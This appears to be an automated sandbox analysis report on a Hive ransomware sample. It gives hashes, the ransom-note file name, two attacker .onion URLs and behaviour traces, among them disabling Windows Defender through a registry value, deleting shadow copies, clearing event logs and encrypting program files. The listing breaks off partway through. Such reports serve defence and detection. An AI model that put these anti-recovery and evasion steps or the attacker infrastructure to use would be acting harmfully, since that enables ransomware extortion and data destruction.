Analysis
-
max time kernel
145s -
max time network
126s -
platform
windows7_x64 -
resource
win7-en-20211014 -
submitted
22-11-2021 11:29
Static task
static1
Behavioral task
behavioral1
Sample
56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
Resource
win10-en-20211104
General
-
Target
56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe
-
Size
3.5MB
-
MD5
d63d3afed4c1975a7e31906e0e163305
-
SHA1
b3f4e45ef92c5ec76bfdaeb3a19071db65ddd7c0
-
SHA256
56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747
-
SHA512
3c92f0cb5e63620919d7ab412741396fb0f65558a621c4328a69a33ada732f80d03548d3cd88734cd4bc038a7b7c240ecfe61a1f56ead387f04c700fe7d6c1be
Malware Config
Extracted
C:\Program Files\7-Zip\rn9D_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 2056 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 1904 bcdedit.exe 1584 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exedescription ioc process File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\XOCR3.PSP.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_26BmG3JbEqA0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\de-DE\js\slideShow.js 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_BOVKX7-WcbA0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD14768_.GIF.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_OP8BZVtptBs0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OneNote\SendToOneNote-PipelineConfig.xml.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_Db5G7dhuw3U0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\mshwLatin.dll.mui 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0335112.WMF.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_DbyKg5NeH780.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA6\VBE6EXT.OLB.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_JBcAXPPEXGw0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\MSPUB.OPG.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_7exYpsHexno0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FOLDPROJ.XML.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_oUzm6XFLTQg0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\micaut.dll.mui 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin_2.0.100.v20131209-2144.jar.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_5C5Tj-c8B9c0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_zh_CN.properties.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_PGpkvClTeZA0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ICE\ICE.ELM.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_MSkCINGlKFs0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\7-Zip\Lang\vi.txt.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_L5b4W5g9-Sc0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-crescent.png 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\LISTS\1033\TIME.XML.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_iv_ZtvbtPQQ0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\EXCEL.DEV.HXS.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_-80yO8X8Yr00.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00538_.WMF.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_l9FRtmbskc00.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_bottom_right.png 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN04332_.WMF.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_wZh_mHKwnss0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01299_.GIF.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_8Wl4-25NsVk0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\rn9D_HOW_TO_DECRYPT.txt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\css\settings.css 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SUMIPNTG\PREVIEW.GIF.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_5ltRwNBXLeM0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15021_.GIF.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_LQLRWmA-1T40.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Casual.css.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_QZ_Vyvmj7sk0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18224_.WMF.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_ae7F_F3QSQ40.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.nl_zh_4.4.0.v20140623020002.jar.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_c_Vsh_9Jsdo0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Boise.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_AXurjH3vYXQ0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\info.png 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_IJg-6OcyaNQ0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Windows Media Player\ja-JP\wmpnssui.dll.mui 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\PIXEL\PIXEL.ELM.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_pW1i-X13VM40.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\INFOPATHEDITOR_K_COL.HXK.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_Zg2Il8JvqtA0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\fr-FR\js\library.js 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_dot.png 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.runtime_3.10.0.v20140318-2214.jar.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_Ew1GGZOoIyE0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-compat_ja.jar.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_u0QbvC_nEt00.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application-views.jar.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_U3gvFTBYZbY0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_dot.png 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BLUEPRNT\BLUEPRNT.ELM.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_OKGQJJOSRPs0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\de-DE\js\settings.js 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\mip.exe.mui 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Khartoum.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_g05bjBtMI7w0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_right_mouseout.png 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_rainy.png 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\Things\SPLASH.WAV.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_MkDeTlrtSsQ0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Medium.jpg.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_ln53YLMALrs0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Notes_content-background.png 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationLeft_ButtonGraphic.png 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\resources.jar.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_n5IOLb7yUiM0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql90.xsl.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_QedOfQZGpjM0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187839.WMF.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_Tl0y1gzqb9k0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0292278.WMF.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_GxOPATQHYbY0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\WINWORD.DEV_COL.HXT.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_V25hCUBIl4I0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\OIS_K_COL.HXK.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_6EYVNf1v_6U0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SpringGreen\TAB_ON.GIF.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_zcJOBRH_4gg0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ZoomIcons.jpg.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_jH580Kh1_FA0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\DVD Maker\rtstreamsource.ax 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui.zh_CN_5.5.0.165303.jar.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_FQEI4DhSE6U0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.config.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD__X-n6k4PzbM0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00305_.WMF.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_3fHNynZlL8c0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18252_.WMF.jaAtfWD3UEG2Pih5lnKSDdO0v8DDD7W7_Odyc-BrhgD_hXbWbf5v7YQ0.cggbt 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 288 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exe56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exepid process 2088 powershell.exe 2180 powershell.exe 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 1640 wevtutil.exe Token: SeBackupPrivilege 1640 wevtutil.exe Token: SeSecurityPrivilege 1080 wevtutil.exe Token: SeBackupPrivilege 1080 wevtutil.exe Token: SeSecurityPrivilege 1976 wevtutil.exe Token: SeBackupPrivilege 1976 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1344 wmic.exe Token: SeSecurityPrivilege 1344 wmic.exe Token: SeTakeOwnershipPrivilege 1344 wmic.exe Token: SeLoadDriverPrivilege 1344 wmic.exe Token: SeSystemProfilePrivilege 1344 wmic.exe Token: SeSystemtimePrivilege 1344 wmic.exe Token: SeProfSingleProcessPrivilege 1344 wmic.exe Token: SeIncBasePriorityPrivilege 1344 wmic.exe Token: SeCreatePagefilePrivilege 1344 wmic.exe Token: SeBackupPrivilege 1344 wmic.exe Token: SeRestorePrivilege 1344 wmic.exe Token: SeShutdownPrivilege 1344 wmic.exe Token: SeDebugPrivilege 1344 wmic.exe Token: SeSystemEnvironmentPrivilege 1344 wmic.exe Token: SeRemoteShutdownPrivilege 1344 wmic.exe Token: SeUndockPrivilege 1344 wmic.exe Token: SeManageVolumePrivilege 1344 wmic.exe Token: 33 1344 wmic.exe Token: 34 1344 wmic.exe Token: 35 1344 wmic.exe Token: SeIncreaseQuotaPrivilege 1624 wmic.exe Token: SeSecurityPrivilege 1624 wmic.exe Token: SeTakeOwnershipPrivilege 1624 wmic.exe Token: SeLoadDriverPrivilege 1624 wmic.exe Token: SeSystemProfilePrivilege 1624 wmic.exe Token: SeSystemtimePrivilege 1624 wmic.exe Token: SeProfSingleProcessPrivilege 1624 wmic.exe Token: SeIncBasePriorityPrivilege 1624 wmic.exe Token: SeCreatePagefilePrivilege 1624 wmic.exe Token: SeBackupPrivilege 1624 wmic.exe Token: SeRestorePrivilege 1624 wmic.exe Token: SeShutdownPrivilege 1624 wmic.exe Token: SeDebugPrivilege 1624 wmic.exe Token: SeSystemEnvironmentPrivilege 1624 wmic.exe Token: SeRemoteShutdownPrivilege 1624 wmic.exe Token: SeUndockPrivilege 1624 wmic.exe Token: SeManageVolumePrivilege 1624 wmic.exe Token: 33 1624 wmic.exe Token: 34 1624 wmic.exe Token: 35 1624 wmic.exe Token: SeIncreaseQuotaPrivilege 1624 wmic.exe Token: SeSecurityPrivilege 1624 wmic.exe Token: SeTakeOwnershipPrivilege 1624 wmic.exe Token: SeLoadDriverPrivilege 1624 wmic.exe Token: SeSystemProfilePrivilege 1624 wmic.exe Token: SeSystemtimePrivilege 1624 wmic.exe Token: SeProfSingleProcessPrivilege 1624 wmic.exe Token: SeIncBasePriorityPrivilege 1624 wmic.exe Token: SeCreatePagefilePrivilege 1624 wmic.exe Token: SeBackupPrivilege 1624 wmic.exe Token: SeRestorePrivilege 1624 wmic.exe Token: SeShutdownPrivilege 1624 wmic.exe Token: SeDebugPrivilege 1624 wmic.exe Token: SeSystemEnvironmentPrivilege 1624 wmic.exe Token: SeRemoteShutdownPrivilege 1624 wmic.exe Token: SeUndockPrivilege 1624 wmic.exe Token: SeManageVolumePrivilege 1624 wmic.exe Token: 33 1624 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 1836 wrote to memory of 1536 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 1836 wrote to memory of 1536 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 1836 wrote to memory of 1536 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 1536 wrote to memory of 824 1536 net.exe net1.exe PID 1536 wrote to memory of 824 1536 net.exe net1.exe PID 1536 wrote to memory of 824 1536 net.exe net1.exe PID 1836 wrote to memory of 840 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 1836 wrote to memory of 840 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 1836 wrote to memory of 840 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 840 wrote to memory of 1976 840 net.exe net1.exe PID 840 wrote to memory of 1976 840 net.exe net1.exe PID 840 wrote to memory of 1976 840 net.exe net1.exe PID 1836 wrote to memory of 1896 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 1836 wrote to memory of 1896 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 1836 wrote to memory of 1896 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 1896 wrote to memory of 288 1896 net.exe net1.exe PID 1896 wrote to memory of 288 1896 net.exe net1.exe PID 1896 wrote to memory of 288 1896 net.exe net1.exe PID 1836 wrote to memory of 300 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 1836 wrote to memory of 300 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 1836 wrote to memory of 300 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 300 wrote to memory of 1928 300 net.exe net1.exe PID 300 wrote to memory of 1928 300 net.exe net1.exe PID 300 wrote to memory of 1928 300 net.exe net1.exe PID 1836 wrote to memory of 1072 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 1836 wrote to memory of 1072 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 1836 wrote to memory of 1072 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 1072 wrote to memory of 1572 1072 net.exe net1.exe PID 1072 wrote to memory of 1572 1072 net.exe net1.exe PID 1072 wrote to memory of 1572 1072 net.exe net1.exe PID 1836 wrote to memory of 1328 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 1836 wrote to memory of 1328 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 1836 wrote to memory of 1328 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 1328 wrote to memory of 1644 1328 net.exe net1.exe PID 1328 wrote to memory of 1644 1328 net.exe net1.exe PID 1328 wrote to memory of 1644 1328 net.exe net1.exe PID 1836 wrote to memory of 1656 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 1836 wrote to memory of 1656 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 1836 wrote to memory of 1656 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 1656 wrote to memory of 1704 1656 net.exe net1.exe PID 1656 wrote to memory of 1704 1656 net.exe net1.exe PID 1656 wrote to memory of 1704 1656 net.exe net1.exe PID 1836 wrote to memory of 1668 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 1836 wrote to memory of 1668 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 1836 wrote to memory of 1668 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe net.exe PID 1668 wrote to memory of 1696 1668 net.exe net1.exe PID 1668 wrote to memory of 1696 1668 net.exe net1.exe PID 1668 wrote to memory of 1696 1668 net.exe net1.exe PID 1836 wrote to memory of 1432 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe sc.exe PID 1836 wrote to memory of 1432 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe sc.exe PID 1836 wrote to memory of 1432 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe sc.exe PID 1836 wrote to memory of 1768 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe sc.exe PID 1836 wrote to memory of 1768 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe sc.exe PID 1836 wrote to memory of 1768 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe sc.exe PID 1836 wrote to memory of 1968 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe sc.exe PID 1836 wrote to memory of 1968 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe sc.exe PID 1836 wrote to memory of 1968 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe sc.exe PID 1836 wrote to memory of 2020 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe sc.exe PID 1836 wrote to memory of 2020 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe sc.exe PID 1836 wrote to memory of 2020 1836 56c72444a610c757a3ff81d991681a51c42e5e839dbaeaf15887f075cde83747.exe sc.exe PID 1836 wrote to memory of 1176 1836 